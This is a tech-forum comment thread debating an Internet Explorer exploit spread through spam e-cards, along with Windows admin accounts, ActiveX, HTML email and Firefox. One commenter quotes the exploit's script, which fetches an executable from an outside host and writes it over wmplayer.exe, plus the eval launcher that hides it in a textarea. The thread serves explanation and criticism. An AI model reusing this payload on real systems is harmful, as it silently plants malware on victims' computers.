I enjoy the OS X way of handling it.

An Item named 'Foo' already exists in this location. Do you want to replace it with the one you are moving?
(Check box) "Apply to all" --button 1 "Don't Replace" --2 "Stop" --3 "Replace"

Very informative and useful.

fs

Re:The most frightening bit here

Its hidden. Hold shift (or was it control?) and click on "No". There ya go.

Re:The most frightening bit here

[kisrael]

Yeah, a checkbox plus 3 buttons is probably better than 5 buttons.

Course, to this Windows'ed guy, it seems like the most action-y, 'positive' button should be to the left, with the "stop all this" button (aka Cancel) to the right, but still

Re:The most frightening bit here

[filmsmith]

I agree...mostly. The positive "LET'S DO IT!" (or, in some instances, replace 'positive' with 'safe') button always hangs out on the right in the Mac world, but for every dialog there's always distance between the 'Do It' and the 'Wooah, son!' button.

This particular dialog, however, has it all stacked as I wrote it, on one line all in a row. Bad move, in my opinion. Isolate the Apply to All on it's own line and throw the "Replace" at the far left of the box, then some space, then "Stop" and "Do Not Replace"

There are other flaws with this dialog box, but not in its intent, just its coding and so I'll not go into them here, but that checkbox really does hook it up. Before they revamped that dialog, I envied the windows users with their "Yes to All" button.

fs

Re:The most frightening bit here

[dustmite]

After pondering how truly mind-numbingly amazing it is that a company with so much money, resources, programming talent, knowledge, and (they claim) the will, still have such a ridiculous insecure operating system. And I've slowly, eventually come to the conclusion that Microsoft do not want to make a secure desktop operating system. Their strategy is simple: allow the Internet to become one huge, sticky mess of popups, security problems, spammers, hackers, virii, bank account info theft, etc that the Internet eventually becomes almost intolerable for ordinary users to use (we're getting there). Then just when people can't stand it anymore, they will "come to everyone's rescue": they will make a big announcement that they intend to replace all the (horribly insecure) OLD (standard) Internet protocols (that are supposedly allowing spammers/hackers etc to flourish), with new, super-secure, super-proprietary Microsoft-specific standards! And just in time for Longhorn/DRM .....

It's the old scam of letting a tame lion loose in the town square, scaring the people, then becoming the town hero when you catch the lion.

And people will fall for it, hook, line and sinker. Just like people really believe today that Microsoft were the innovative company that first "made computers user-friendly", someday they will really believe that Microsoft were the innovative company that "made the Internet secure".

Think about it ... even the fact that Microsoft have begun making all these noises about "trusted computing", and have even recently started making noises about "getting rid of the spam problem".

Re:The most frightening bit here

[kisrael]

Heh, I'm having flashbacks to
[A]bort, [R]etry, [F]ail ?

style messages. Looking back, I can kind of guess what's the difference between Abort and Fail (kill the program vs let it go on, hopefully realizing it failed) but man....those really were dark ages of UI

Re:The most frightening bit here

[jafiwam]

In NT4, you can hold down the shift (or is it ctrl?) key while pressing "NO" to get "No to All".

I don't know about later versions though.

Its a really useful feature when you find a more compressed version some porn jpgs you want to add to your higher quality, less compressed partial set.... or something like that.

Re:The most frightening bit here

[JurgenThor]

Windows XP finally has a 'No To All' for a lot of these operations. I danced the crazy-happy-dance when I saw it. Also, some its dialogs have a checkbox with the meaning of "use this answer for the rest of the questions". Sure, they're not consistent, but at least they've GOT them finally. Still waiting on dialogs with verbs for buttons (ala Macs - 'Replace', 'Replace All', 'Don't Replace', 'Don't Replace All'), rather than the oft convoluted description of which button to click.

Re:The most frightening bit here

[Kaki+Nix+Sain]

I have considered a similar but slightly less horrible idea before. Perhaps they don't do it for such a far reaching "take over the world" reason. However, by not putting a pop-up blocker in IE, Microsoft has generated revenue for tons of companies that have developed and sold them. Similarly, the lack of security helps the developer community for Microsoft's platform by giving them problems with easy solutions and a captive market of people with those problems.

If you solve all the customer's problems then you don't see that customer again.

Re:The most frightening bit here

[lizrd]

In my experience, this has almost always been the case that things want to create a new key in the registry (for a saved game, or for a recent document or something) and they can't write to the registry as a normal user.

These are prime examples of things that should be written to HKCU and not HKLM. The fact that they need Admin access to store user data shows why they are doing things wrong. It also shows how the concept behind a desktop PC is that is will be used by a single person and therefore doesn't need to separate program data from user data.

It's hard to overcome this, since the concept of multiple users and separation between them doesn't really make all that much sense on a personal computer.

Re:The most frightening bit here

[Imperator]

Have you ever seen XP Home? You don't have access to the W2K-style users and groups MSC plugin. There really are only two account types for users: administrator and crippled. Oh, and I think there's a "guest" account you can activate. I don't know if the full API is still there and you just need a third party app, but at least by default it's not easy to create non-admin users that can actually do anything.

Re:The most frightening bit here

[Threni]

You need to get a completely seperate partition for them to boot into, with a boot-time menu, or at the very least a seperate account for them.

If you look on the net there's quite a few sites detailing the problems with peoples attitude to security. "security is a process not a product" and all that.

Re:The most frightening bit here

[zero_offset]

Microsoft's decision to ship no Java Virtual Machine in Windows XP

That "decision" was made for them by a court. In other words, Sun managed to litigate a preinstalled VM off of the most popular and ubiquitous platform in the history of computing. This is something industry experts refer to as "stupid".

Re:e-cards

[toasted_calamari]

What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

With regards to the article, thats definitly one of the nastiest browser exploits i've seen in a long time, makes me glad I don't use windows and IE.

It'd be scary if I ran my PC as Administrator...

[gfecyk]

...and if I was stupid enough to actually install the crapware the strange website/email/stranger gave me.

Spylog is not spyware!

[tgma]

While I commend the original article as an interesting dissection of an attempted attack via spam, the heading is a little sensational. It mentions Russian spyware sites, but the site in question is Spylog.com, a reputable Russian monitoring site. Not everything on the Russian internet is malicious, and Spylog does some good work on reporting statistics about the Russian internet.

Just a minor correction.

Re:Spylog is not spyware!

[randyest]

Did you RTFA? I did, and failed to find anything untoward or even mildly "sensational" about the spylog section. There is no mention of any "Russian spyware site(s)" anywhere, and exactly one reference to Russia, which says:

Despite its malicous sounding name, all this file contains is the tracking code provided by a russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.

Exaclt what part of the above (benign) description do you think you "corrected" via your post?

Re:Spylog is not spyware!

[mlefevre]

tgma apparently did RTFA, as they say "I commend the original article". tgma is complaining about the slashdot story, where the submitter has introduced a mention of "Russian spyware sites".

Re:Spylog is not spyware!

[Ant2]

Hmmm...if Spylog were collecting data from my machine without my permission, I'd consider that spyware. But, hey, that's just me.

Re:Spylog is not spyware!

the same data that ANY site could detect and most do when you visit... get real here.

Russian spyware.

[sorlov]

Once again /. offers excellent analysis. spylog.com is not spyware. It's site statistics. In fact the article author says spylog.com is used to gather statistics. Slashdot editors don't read the articles?

Re:Russian spyware.

[Chuck+Bucket]

you must be new here.

CB

Re:Russian spyware.

[thestarz]

Slashdot editors don't read the articles?

Read the article? That's crazy talk!

Re:Russian spyware.

[DR+SoB]

"Once again /. offers excellent analysis. spylog.com is not spyware. It's site statistics. In fact the article author says spylog.com is used to gather statistics. Slashdot editors don't read the articles?" Yeah, what the HELL.. That's not spyware!!! Who would have thought that people keeping statistics on me, without my knowledge, from some application that has installed itself on my computer in the background, would be called SPYWARE.. You /. editors just don't have a CLUE do you?! *cough* *LAUGH* ok, I couldn't hold it in.. Seriously SORLOV, why don't you look up the definition of spyware, before posting such trash? I mean, the name "SPYLOG" pretty much should sum it up for you. Maybe if they called it "THISISFUCKINGSPYWAREYOUSTUPIDPIECEOFSHIT.EXE" you'd think "umm, it's just keeping harmless statistics".. Do you really want ANYTHING from RUSSIA installed on your computer? Now do you want ANYTHING with the word "SPY" installed on your computer? How about anything from russia with SPY in it.. Nope, your right...harmless.. (Now THAT was a rant!)

Re:Russian spyware.

[MotherInferior]

(Now THAT was a rant!)

A decidedly silly and pointless rant, but one nonetheless.

Active X

[g0bshiTe]

Active X through IE has always been able to execute code on a Windows box as the user logged in. Theres nothing new about that. It looks to me like it could be an attempt to upload and install the HIJACKTHIS trojan.

A little bit unfair to Outlook

[DoorFrame]

This story is presented as an example of the bad things that can happen from opening spam in Outlook ("If you're still using Outlook and Internet Explorer, this is a good time to find alternatives"). But the story doesn't point to any actual isssue with Outlook, only exploits in Explorer that allow downloaded code to be executed remotely. The Outlook bashing seems out of place.

Re:A little bit unfair to Outlook

[GigsVT]

How do you think Outlook displays mail? Last I checked, it embeds the IE control.

Re:A little bit unfair to Outlook

[ncr53c8xx]

How do you think Outlook displays mail? Last I checked, it embeds the IE control.

It gets worse. Microsoft does not provide a standalone download to update IE. The only way to get the update is to run the stubb they provide which starts up IE as Administrator!! No wonder many machines get p0wn3d during patching.

Re:A little bit unfair to Outlook

[ONOIML8]

Do they really? I've often wondered about that. It seems so ironic that you could set out to do a security update and open yourself wide open for a good shafting in doing so.

I'm not sure it's good to know that my paranoia is reality on that one.

At what point

[GigsVT]

Does this stuff get treated like a virus/trojan, rather than legitimate business?

If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.

It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).

People actually get pissed off when we tell them they can't have weatherbug on their computer.

Re:At what point

[Paisley+Phrog]

then it's OK for you to write viruses and trojans (like weatherbug).

From everything I've read, WeatherBug isn't a trojan...it's adware and will put banners on your desktop for the service it provides, but they're rather up-front about that.

Perhaps you mean WeatherCast?

Re:At what point

[GigsVT]

If by upfront, you mean buried near the last page of a very long EULA, then yeah, I'm inclined to agree.

I actually read the EULA before I told people we couldn't install it, because I hadn't heard if it before they asked, but it sounded sleezy.

Re:At what point

"FBI or SS arresting the people"

damn i thought you meant like nazi ss, the Sicherheitsdienst. and i was goign to say damn, americans have started resurecting war criminals to enforce justice?
i mean it is the next logical step

Re:At what point

[mixmasterjake]

although i don't love it, i don't have a problem with ad-supported software that shows ads while you use it (like weatherbug, opera, etc).

perhaps it's a fine line, but programs that redirect your searches to an alternate site, pop-up windows while your not using the product, install other products and links on your desktop, etc. are in a different category than an ad-supported piece of software.

advertising is annoying, but a legitimate way to earn revenue in exchange for a free piece of software. i'd prefer to save my bashing for the real problem apps, like this credit-card stealing spam.

Are there really better alternatives???

[TopShelf]

The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?

Not trolling, just asking an honest question here.

Re:Are there really better alternatives???

[nutznboltz]

Are packages like Firebird really more secure

Back when there was a Firebird it didn't send or receive mail so, yes, it's incredibly secure.

A better question is ThunderFox, er, Thunderbird more secure?

Re:Are there really better alternatives???

[TopShelf]

My bad - I had finished reading the article, wherein he recommends Firefox and Thunderbird, and thus got mixed up.

But hey, it's Monday morning...

Re:Are there really better alternatives???

[aborchers]

The "alternative" clients typically do not do things like run scripts, overwrite files, etc without at least a confirmation from the user. The problem is that IE and Outlook are so feature rich, and so easily configured (historically by default) to gullibly trust any command that comes down the pipe, that they pose a severe risk to exactly the class of users (i.e. inexperienced or ignorant) that most frequently use them.

So, in effect, yes, there is an aspect to the other clients that is inherently more secure, but users savvy enough to obtain and use them could probably also configure and use most modern MS products fairly securely as well. It is a combination of user behavior and software design security.

For the record, I find it hard to believe that someone with a 5-digit /. ID could ask this question and not be trolling... ;-)

Re:Are there really better alternatives???

[betelgeuse-4]

The Linux/Firefox/Thunderbird (or other F/OSS) solution is probably safer than MS IE/Outlook. However a lot of viruses/worms/trojans etc. rely on a bit of social hacking. If Linux dominated the desktop market, there would be plenty of people who would run as root and chmod +x files from strangers.

Re:Are there really better alternatives???

[TopShelf]

Just because I've been around here a while doesn't mean I'm an expert in the security features of various browsers. I've just started using Mozilla in the last few months, more for the wonders of tabbed browsing than anything else...

Re:Are there really better alternatives???

[jfengel]

Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.

Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.

I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.

Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.

Still, having be written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.

Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.

Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.

Re:Are there really better alternatives???

heises browsercheck

has a list of many (if not all) known browser exploits, with demo code.

Make the conclusion yourself.

Re:Are there really better alternatives???

[ktulu1115]

The quick, simple answer: Yes

The long-winded answer: Yes... Not only is IE known for a long history of insecurity, mostly due to the wonderful company located in Redmond, Washington. We also know that Microsoft loves integration, specifcally with their software: which brings you ActiveX and VBScript integration into IE. What a wonderful thing. With administrator rights and the correct (I should say incorrect) privacy settings, skript kiddies can pretty much do what they please with your box - This story being a case-in-point. A quick Google came up with this: IE considered harmful. I do not know the full details of the content in that link, nor do I affiliate myself with the author, but he does bring up several good (and valid) points.

Now for alternative browsers (I will focus on Firefox. For starters, it's open source (available at cvs.mozilla.org), which IMHO may not make it more secure by itself, but does it definately doesn't hurt. "Security through obscurity" also isn't an issue because of this. It does not have VBScript/ActiveX integration, so you don't have to worry about Mozilla/Firefox overwriting any file on your PC it was told to do by some script. Furthermore, Mozilla wasn't designed to have functionality to do such things in the first place (AFAIK) which obviously means it's not possible, even with a security flaw.

All of these reasons combined should clearly demonstrate that Mozilla/Firefox is a more secure browser (then IE). I honestly don't believe anyone could think otherwise.

Re:Are there really better alternatives???

[cuiousyellow]

Ah, a security-through-obscurity hater. It certainly hasn't worked for MS Outlook or Internet Explorer so I understand your reservations.

Assuming honest intentions as declared, the straight answer is "yes".

Outlook + IE users are in the bullseye of a majority of worm authors and getting out of range altogether is only a step away.

Saner advice would be to suggest that MS modify OfficeUpdate patching to suggest copying the cd to the users HD so that they won't need it agaiin and to integrate it into their auto-downloader -- Outlook users have already decided upon a feature set and suggesting they made the wrong choice is going to be ignored.

Re:Are there really better alternatives???

Yes, they are.

Firefox, the browser, doesn't support ActiveX or VBScript. It supports JavaScript instead. The latter runs in a sandbox which prevents it from writing files to disk without specific permission. This evidentally doesn't apply to ActiveX, I don't think it applies to VBScript either. Also JavaScript can be turned on and off for specific sites with Firefox. Firefox also blocks unwanted popups and can limit certain JavaScript actions used for malicious purposes.

Also FireFox generally has a better security record (it wasn't affected by the recent %00 URL re-writing bug for example).

Thunderbird has a built-in set of filters for removing spam. These can learn the difference between spam and non-spam and are thus better than most at eradicating most spam mails. This system of Bayesian filters has been so successful that Microsoft has announced that it was be added to the next version of Outlook.

Also Thunderbird doesn't support VBScript, and uses the same core browsing component as Firebird for displaying pages. It can also be set up so it never displays HTML email.

The absence of VBScript and ActiveX may sound like a flaw in these two pieces of software, but in practice they have rarely been used for legitimate purposes. I've been using Firefox and Thunderbird for quite a while now without any problems.

Note, in the interests of fairness, I should say that you can disable ActiveX in Internet Explorer, however the last time I used IE, ActiveX was still on by default. This may have changed with the security push as Microsoft. But Firefox has less security breaches in general, is still under active development, and is better out of the box.

Re:Are there really better alternatives???

[orthogonal]

The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

Go to web-site, get a new OS!

And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?

To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.

I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

What the hell?

Re:Are there really better alternatives???

[ONOIML8]

"I don't mean that to insult MS"

That's ok, don't worry about it. They usually end up insulting themselves with stupid statements, poor products, lack of security, etc. So your comments are no big deal, don't worry about it.

Or are you afraid they'll send lawyers after you??

.

Re:Are there really better alternatives???

[aborchers]

Just a little teasing. If I'd really thought you were trolling, I wouldn't have responded. I just meant that I figured you'd have seen that question batted around before.

I'm a Mozilla devote' as well. I used Opera before, but Moz won me over.

Re:Are there really better alternatives???

[wagemonkey]

If you only want the browser firefox is pretty good.
The mouse gestures work in firefox too, even though the docs don't mention it, if I can get multizilla working on firefox too I think I'd switch totally. I split between Moz, Firefoz and Opera at the moment, they all have their strengths, I suppose I could live with any of them - I just need to make my mind up.

Re:Are there really better alternatives???

Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:

Guess what, Mozilla has a similar "feature". It's called XMLHTTPRequest. You can make GETs and POSTs with it. I know for a fact that the User Agent Switcher Firefox extension secretly uses this. Here's an excerpt from the jarfile source:

// Initializes the about dialog
function useragentswitcher_initializeAbout()
{
var latestVersion = 0;
var request = new XMLHttpRequest();

// This must be done to make generated content render
request.open("GET", "http://chrispederick.myacen.com/work/firebird/use ragent
switcher/version.txt", false);
request.send("");

There's also a Mozilla API execute method under the File object. I haven't look into it too much, but it's something to look out for. I've often wondered if a malicious script kiddie took the time to study the XULPlanet docs, what kind of havoc they could wreak.

Re:Are there really better alternatives???

The only thing a simple script like this could touch on my box is /home/ealar/*

That gets backed up nightly and every time the directory changes by 200kb.

I don't really think such a script would have a major impact on my box.

Re:Are there really better alternatives???

[orthogonal]

Firefox, the browser, doesn't support ActiveX or VBScript. It supports JavaScript instead. The latter runs in a sandbox which prevents it from writing files to disk without specific permission.

The exploit in the html isn't running VB; it's running (Microsoft's implementation of) javascript, which can instantiate and call functions on ActiveX objects. You can see this in this snippet of the code, which is called (indirectly) by the java function (document.all.code.value is the contents of a hidden text box, suitably escaped by the function preparecode).

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}

(And contrary to a prior post of mine, my Proxomitron setup would have caught this, as it replaces any occurrence of "setTimeOut" with "noSetTimeOut" which isn't a javascript function and therefore never runs.)

Re:Are there really better alternatives???

[zoney_ie]

> thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

Heh heh, yup, that's pretty impressive even for Windows. You gotta love it. (brushing your teeth with Coca-cola style loving it)

For real fun though, you can beat putting a Win9x installed HDD into a different machine and booting it up. It's like a brain transplant as far as the OS is concerned - watch it go NUTS. (Hey looky, I've found 3 PCI bridges, 10 processors and 50 other motherboard components!)

Re:Are there really better alternatives???

[WWWWolf]

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

What kind of slacker wrote this code, anyway? "C:\Program Files\" isn't in the same place for everyone, even in out-of-the-box Windows installs. For me, it seems to be "C:\Ohjelmatiedostot\" =)

This is probably the only kind of case I can thank Microsoft for the way they do localizations, but frankly, I like the Mac/*NIX way of doing localized file names (the real filesystem name is same everywhere, the file manager shows the appropriate translation if needed...)

Re:Are there really better alternatives???

[orthogonal]

Guess what, Mozilla has a similar "feature". It's called XMLHTTPRequest.... There's also a Mozilla API execute method under the File object.

OK, it's a bit unsettling that a FireHedgeHog extension hard-codes a request to its author's page.

But still, it's in an extension that the user affirmatively installed.

Can XMLHTTPRequest and File.execute be used in javascript loaded into the browser from a web site/ file, or only from installed .jar files?

If the former, yes, it's a problem. If it can only be called form installed jars, I'm less worried.

Re:Are there really better alternatives???

[wunderhorn1]

"brushing your teeth with Coca-cola style loving it" is my new favorite catchphrase. do I credit you, or is there an original source for it?

Re:Are there really better alternatives???

[zoney_ie]

Nope, I can assure you that is one phrase I have not heard anywhere else but in the ramblings of my imagination!

I must remember it though, tis quite good.

Re:Are there really better alternatives???

[pegr]

Bow before my 5 digit greatness, you six-digit swine! (Cold thread, thought I'd use it to get your attention...)

OK, now where's that thread where I get beat up by a gaggle of 2 and 3 digit /. gods? ;)

Re:It'd be scary if I ran my PC as Administrator..

[ggvaidya]

That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

Conclusions

[kyshtock]

I believe that there are at least 2 conclusions here:

1. Clicking can be dangerous.

2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.

Don't run ActiveX as Administrator, simple.

[gfecyk]

Win98 is supposed to be gone, or no longer supported.

Assuming that, and that your WinLusers are running current versions of Windows with actual security, and they're running as regular users, a web page CAN'T overwrite anything because regular users don't have write permissions in %systemroot% or in Program Files.

Problem solved. Without a script blocker or any other third-party garbage.

Re:Don't run ActiveX as Administrator, simple.

[glenrm]

Huh, so what if you are running has admin, why would I want a web page to overwrite .exe files without asking permission? In the race to keep up with Java some very unsafe things were done with ActiveX...

Re:Don't run ActiveX as Administrator, simple.

[jdhutchins]

Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

Re:Don't run ActiveX as Administrator, simple.

[dAzED1]

that simple? Really?

My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.

Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.

for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.

Re:Don't run ActiveX as Administrator, simple.

[0123456]

Yep. Even for video editing I have to run as Administrator, and I really don't want to have to keep changing users in order to run different programs. I did try to set up a non-Administrator user for my GF to use on the same PC, but half the programs she wanted to run wouldn't work without Administrator priviledge, so I gave up.

"Security" in Windows is just broken, it's that simple.

Re:Don't run ActiveX as Administrator, simple.

[sqlrob]

Win98 is supposed to be gone, or no longer supported.

Not true. Support was extended two years.

Re:Don't run ActiveX as Administrator, simple.

[ncr53c8xx]

Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

You don't need admin access unless you want to run some system utilities. The only time I had to login as admin was when I tried to run Sandra. I have found several programs that need Power User access to function properly though (RealJukebox etc). Since the Power Users group members can install software, this is somewhat undesirable.

Re:Don't run ActiveX as Administrator, simple.

[sammy+baby]

Don't run ActiveX as Administrator, simple.

And don't use Windows Update, either, as it requrires an ActiveX control to version-check your installed software.

Re:Don't run ActiveX as Administrator, simple.

[jasonbowen]

I'd like to do that, but if I don't run as adminstrator by default, I have to manually run as administrator and type in the administrator password for nearly every piece of software I use. Why can't Microsoft implement a concept like SUID?

Re:Don't run ActiveX as Administrator, simple.

[the_L0rax]

They're right, even if you know better than to have your regular account be an admin account MS pretty much forces you to operate that way. I have tried setting up seperate accounts and it just isn't practical. Way too many things require you to have admin priviledges, so you can either switch users every 3rd program or you just give up and use an admin account. Even right clicking and choosing "Rus As" rarely works right. Microsoft made a half-a**ed attempt at multi-user support just so they could say they had it.

Re:Don't run ActiveX as Administrator, simple.

[AndroidCat]

You can set microsoft.com (or where-ever) as a Trusted site. (You trust Microsoft, don't you?) I made Slashdot a Trusted site because of something that wanted to run ActiveX all the time. (Normally it prompts. Every page.) I think I'll review that and move Slashdot to my Hell No! zone if it won't break anything.

Turn off HTML viewing in your email client!

[turnstyle]

I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!

It's an easy way to protect yourself from all sorts of stupid stuff.

Ahem, turn off HTML viewing in your email client NOW.

Re:Turn off HTML viewing in your email client!

[ackthpt]

I've been usuing The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

Support shareware :-)

Re:Turn off HTML viewing in your email client!

But that's a cool feature!

What next? Should I stop using Outlook???

Re:Turn off HTML viewing in your email client!

[simp]

Switch off HTML formating for Outlook.

See http://support.microsoft.com/default.aspx?scid=kb; EN-US;307594 on how to do it.

Re:Turn off HTML viewing in your email client!

[Erik+Piper]

There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just words. I do tech support, and I'm THRILLED when the person on "the other end of the line" sends me an HTML e-mail, because it means I can use the features of HTML mail to provide him or her a clearer, more visible explanation, and if that person has a decent Internet connection, I can even ask them to paste screenshots into their e-mails instead of trying to guess which client they have and how pasting attachments in it works, and then explaining it to them and hoping they understand.

Erik

Re:Turn off HTML viewing in your email client!

[JPriest]

There is a client called pocomail that I use that is pretty safe. It has an intuitive spam filter, you can script it to do about anything with mail, and it has a simple filter setup for sending messages from X to folder Y.

spam filter:
"viagra", +9
"herbal", +6
"natural", +6
"to be removed", +5
"free", +2
"!!!", +2

You get the point. You can toggle things like loading external graphics etc. It is really a mail client for power users. Shareware, but one of the few programs I ever purchased.

Re:Turn off HTML viewing in your email client!

[pldms]

There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just word

Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,

Re:Turn off HTML viewing in your email client!

[Erik+Piper]

But in terms of real, non-technical end-users, HTML is what's out there.

Erik

Re:Turn off HTML viewing in your email client!

[RetroGeek]

features of HTML mail ... paste screenshots

And pasting a screen shot into a word processing document, then attaching that is not OK? Yes, a little more work, but the benefit is safer Internet use for the rest of us.

Email is Email. HTML is for Web pages. The marriage of the two (Thanks Bill!) makes SPAM more dangerous, lets the email sender track you (via 1x1 images), and makes email messages MUCH larger thereby wasting bandwidth.

Re:Turn off HTML viewing in your email client!

Switch off HTML formating for Outlook.

Hah. If that would be the only problem with Outlook.

Re:Turn off HTML viewing in your email client!

[misleb]

But in terms of real, non-technical end-users, HTML is what's out there.

The point is, attaching pictures to email has absolutely nothing to do with HTML. "Non-technical end-users" don't compose HTML that references pictures because it requires having a Web server to serve the pictures. All you are really going to get out of HTML in an email is varied fonts and colors. As neat as that might be, it is hardly enhanced communication. Nor is it worth the risks.

95% of the HTML email I get is spam. The other 5% is messages from mailing list subscriptions or Amazon or whatever. Most of those come with both plain text and HTML. If nothing else, most "nontechnical end-users" would do good to turn off HTML so they won't have to look at offensive porn spam with obscene images (not attachments).

-matthew

Re:Turn off HTML viewing in your email client!

[Endive4Ever]

The image being part of the message is supposed to be a good thing?

I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

Why shuttle around bloated email attachments?

Re:Turn off HTML viewing in your email client!

What sucks is that Microsoft (thanks, Bill!) decided to use IE as the viewer for emailed HTML (specifically, it's the core part of IE that's being recycled in Outlook, effectively IE). So not only can an Outlook bug get you, you'll get double-dipped by any IE bugs that are out there. Lovely!

Re:Turn off HTML viewing in your email client!

[corbettw]

Clickety click.

Re:Turn off HTML viewing in your email client!

[Erik+Piper]

Ummm... because you're an ordinary mortal and don't have your own webspace somewhere, perhaps?

Because, in the case I case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?

A LOT of damn good reasons. It is indeed supposed to be a <i>good</i> thing.

Erik

Re:Turn off HTML viewing in your email client!

[misleb]

I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

This isn't a realistic option for most people. Nor is it very convenient. Unless, of course, the image is part of an existing website.

Why shuttle around bloated email attachments?

It is not a big deal in most cases. Although this brings up an interesting point. There are cases when people want to send files (maybe an MP3 or movie) in excess of 5 megabytes. This is not appropriate for the current state of email (SMTP, et al). What do regular users do when then want to send someone a large file? They're not going to choke MY SMTP servers (with virus scanning) with their huge attachments.

-matthew

Re:Turn off HTML viewing in your email client!

[gnu-generation-one]

"I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!... It's an easy way to protect yourself from all sorts of stupid stuff... Ahem, turn off HTML viewing in your email client NOW.

I misread that as "turn off HTML viewing in your web browser NOW", and wondered why it wasn't marked as funny...

Well, it would make some things safer...

Re:Turn off HTML viewing in your email client!

[FooAtWFU]

I don't have HTML viewing available... I use Pine, you insensitive clod!!! ;)

Re:Turn off HTML viewing in your email client!

[randomblast]

or alternatively use a real mail client like evolution :p

